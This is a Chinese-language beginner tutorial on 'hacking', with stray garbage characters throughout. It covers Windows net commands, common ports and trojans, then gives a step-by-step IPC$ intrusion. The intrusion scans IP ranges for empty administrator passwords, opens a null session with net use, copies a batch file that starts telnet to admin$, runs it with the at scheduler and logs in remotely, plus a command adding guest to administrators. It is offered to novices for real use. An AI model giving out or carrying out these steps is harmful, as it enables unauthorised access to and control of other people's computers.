, e. H h6 s; F* V" c前言:你是不是很想做黑客呢?是不是经常周游于各个黑客站点呢?学黑客是真的很难的!它需要你有足够的耐性!毅力!只有持之以恒才能有所成就!好了~灌了那么多的水,下面就开始吧!注意:本文只适合新手!已入门的请去看别的技术文章吧!下面就用我仅仅知道的知识让你们取得第一次的成功吧!\\操作系统拜托你装个2000的好不好?不要再问为什么了~\\(本文注释用"\\注释内容\\"标记!
+ k) Y" h, F5 b& @8 q9 t+ G第一节课:命令的使用
8 [ E& M% M$ e2 H你必须懂得一些命令才能更好地运用!总不能一边入侵一边去看例文吧!(什么?你喜欢?我晕了~)好了~下面就看看一些常用的命令吧!也就是入侵必须懂得的基本命令!如果你连这都栏得看的话你就可以放学了~放你的长假去吧!
2 h! u- H2 X. i0 V0 d1.net
/ b0 J: e/ z! _6 {* e' l' b2 W6 h7 cnet [ accounts | computer | config | continue | file | group | help |
* ]0 g# u- D% m' fhelpmsg | localgroup | name | pause | print | send | session |
( l3 \( t5 G# U1 s( [# C6 b& j2 xshare | start | statistics | stop | time | use | user | view ] & {" G# [* t( f' {+ ?. A
上面就是net命令.你可以在cmd下键入net/?获得.我们看看一些常用的.
9 J* S# a& X+ y- F1 b. R* `net user \\列举所有用户\\ 例子:c:\>net user
: \6 L1 |1 q b" j1 qnet localgroup \\把用户分组\\ 例子:c:\>net localgroup administrators guest /add \\把guest用户加到管理组.需要有足够的权限才能进行操作!\\
+ K* M7 v3 K* C8 jnet share \\显示共享资源\\ 例子:c:\>net share - t- k% ~) c" w1 `% }
net start \\启动服务,或显示已启动服务的列表\\ 例子:\>net start 例子:\>net start telnet \\启动telnet\\
3 ~9 l" T2 I5 p* Pnet stop \\停止windows2000网络服务\\ 例子c:\>net stop telnet \\停止telnet服务\\ 2 h. `, {) D; q1 _( P* L
net time \\显示时间\\ 例子:c:\>net time 127.0.0.1 \\显示127.0.0.1的时间\\ ) R: C; ?5 h5 S, o
net use \\显示关于计算机连接的信息\\ 例子:c:\>net use ' `8 i1 e' k! q3 j$ v6 Y" r! c
net view \\显示域列表、计算机列表或者由指定计算机共享的资源\\ 例子:c:\>net view $ I8 i5 w4 v! E) X: N I3 h2 g
net的基本命令就到此结束吧!但并不是说其它的命令不用去学!只是我的基本教学(入侵)课程需要用的命令是这些而已~自己去windows帮助那里看看吧!dos下的基本命令是很重要的!如:copy等.还有ftp等等重要的命令因为种种原因请各位自行去看.(基本课程不能太复杂的,ok?!!!)好了~下课~
1 p$ d: z7 K8 \! [4 m* F+ M; i# N) q第二节课:端口和木马 q) M0 I- e0 o; L' Y
a.第二节课了~这节课我们首先来学习一下端口吧!什么是端口?就是计算机和外界连接的通道!例如我们看网页用的实际上是80端口. # K- _4 ]. N6 H) R
1)、telnet登录的端口 (23/tcp) 2 \, R& p9 p# |3 l2 [ B4 @$ H' Z* n
这个信息表明远程登录服务正在运行,在这里你可以远程登录到该主机. 4 M& H% ~) P7 R; Z
2)、www(80/tcp)端口
# A2 H/ g( ]% a) S( f! f它表明www服务在该端口运行 7 U2 S( f. e3 [. E% X8 `
别告诉我你不知道www服务是什么哦,也就是说,如果有网站的服务器都有80端口。
1 t9 Y7 n' v6 L3)、ftp(21/tcp) 6 d2 G$ L' ~# a e9 J
ftp服务和telnet服务一样,你还可以从ftp服务器上获得或上传资料木马等,有的还是匿名登陆的,不过这样的好事好像不多。
' H) a& I1 Q6 u1 e. u4)、finger (79/tcp) 端口
0 ]3 q% C7 G. Y) _finger服务对入侵者来说是一个非常有用的信息,从它可以获得用户信息,查看机器的运行情况等。 6 x& y9 g- w8 f c# t& z+ [1 }7 e4 P$ Y
5)、远程控制(3389) 0 r4 A: F' j; G% G( K# i
这个端口用于远程登陆.
) ^& V( L# n7 W: N还有一些常见的端口例如110,135,139,25等等等.....我们这次基础教程需要用到的是23端口.其它的因为觉得重要所以也列举了出来.剩下的请自己去补补.(不是我不负责任.是课程的问题!请谅解!)ps:并不是所有的端口都是有用的. : D. j0 l9 ?* P, ]% U4 u
b.木马 w0 A, y+ C! u
讲个故事给大家听吧!---->>传说希腊人围攻特洛伊城,久久不能得手。后来想出了一个木马计,让士兵藏匿于巨大的木马中。大部队假装撤退而将木马摈弃于特洛伊城下,让敌人将其作为战利品拖入城内。木马内的士兵则乘夜晚敌人庆祝胜利、放松警惕的时候从木马中爬出来,与城外的部队里应外合而攻下了特洛伊城。
9 C4 g, ~% j6 l/ T6 G$ t木马的危害性是很大的!例如冰河等木马甚至可以远程控制你的电脑!同时木马也会打开一些端口.你也可以借查看端口来看看有没木马在你的电脑上运行.不过有的木马是利用已有的端口的.这个就比较麻烦了.需要用杀毒软件帮忙了~ \\我们的课程并不需要使用到木马.只是本人认为各位值得一学\\ # @5 m0 v" w* J3 k; {
第三节课:ipc入侵.
. U, j2 {& l; {2 G$ ~好了~估计你们看了那么多基础的东西已经很不耐烦了~这节课就来实行你的第一次入侵吧!咳咳~放下你的ak-47,我们不需要那个家伙.... 7 B, ], W+ Y% A$ A% Y$ H
a.什么是ipc?
p% o }0 h8 V, Mipc$是共享“命名管道”的资源,它对于程序间的通讯很重要。在远程管理计算机和查看计算机的共享资源时使用.利用ipc$我们可以与目标主机建立一个空的连接(无需用户名与密码),而利用这个空的连接,我们就可以得到目标主机上的用户列表。用“流光”的ipc$探测功能,就可以得到用户列表了,并可以配合字典,进行密码尝试。 2 `! T) x c' s
b.ok!运用你在上两节课学到的知识跟我冲吧!掌握好你的命令使用了吗?
$ D" t+ H0 X3 K4 F) s9 P需要用的的扫描软件:xscan 操作系统:win2000(不要告诉我你那还是98或者me,我马上k了你!)
+ k- E4 C$ T2 p6 x7 w: z. D9 s; x首先我们使用扫描器扫描一个ip段.打开xscan,选择"设置",再选"扫描模块",然后只选nt弱口令的那项.确定后选"设置","扫描参数"然后填入ip段.就127.0.0.1-127.0.0.255吧!(注意:ip段纯属虚构.)
0 B7 K6 h2 P% n+ t3 O7 o0 @假设我们已经扫到一个了.127.0.0.2 用户名:administrator 密码:空(唉~真搞不清现在的人为什么这么没安全意识...)
- |5 j; f$ v8 J) }% Y/ O打开cmd,输入:net use \\127.0.0.1\ipc$ "" /user:"administrator" 命令成功完成.ok!下一步~ , v2 H/ J+ c; A
at \\127.0.0.1 \\这步纯属个人习惯.因为我想知道他开了at没有.没开就放弃吧\\ / z5 B P0 O$ Y: }4 h. s
接下来我们需要编辑一个批处理文件.打开记事本,输入如下内容:@net start telnet 然后保存为a.bat \\注意扩展名!是bat!\\ + Y8 p" W! ~' Z: }+ [" M y' Y
编辑好后就继续吧! copy a.bat \\127.0.0.1\admin$ \\admin$就是放在目标winnt的根目录下\\
V# A0 ]3 E$ d/ u9 q0 P7 Anet time \\127.0.0.1 \\看看目标的时间吧!有用的~\\ S, f1 Q* m+ _" h, h' m
假设是晚上9点.接着下一步吧! ) g7 R9 Q9 v; ]" o R
at \\127.0.0.1 20:01 a.bat \\用at命令让目标运行a.bat.注意时间要24小时制的!\\
5 d) l6 X. B* G& g# Hnet time \\127.0.0.1 \\看看到时间没?\\
9 Y( C @; m% b- b9 f! l! n+ G+ {假设到了,我们就实行下一步吧!
1 j7 ^0 S) c8 F( O; C/ q( [telnet 127.0.0.1 \\登陆到对方的机子上.刚才的那个批处理就是用来打开它的23端口的~\\ : _8 u6 l5 R, l- s0 t& z3 x
接着输入用户名和密码 \\就是用户administrator啊!密码是空的.回车就行了~\\ 0 @! e8 I9 u' m/ W
ok!一切成功!现在你可以做你想做的事了~例如添加用户等等(就是命令的使用啊!所以说命令重要!) " _- u4 Z5 s# ?1 \ l
请同学们注意不要乱删除别人的东西!我们只是学习技术.谁乱动我立即把他开除. E2 [, e7 W8 h. i: x
|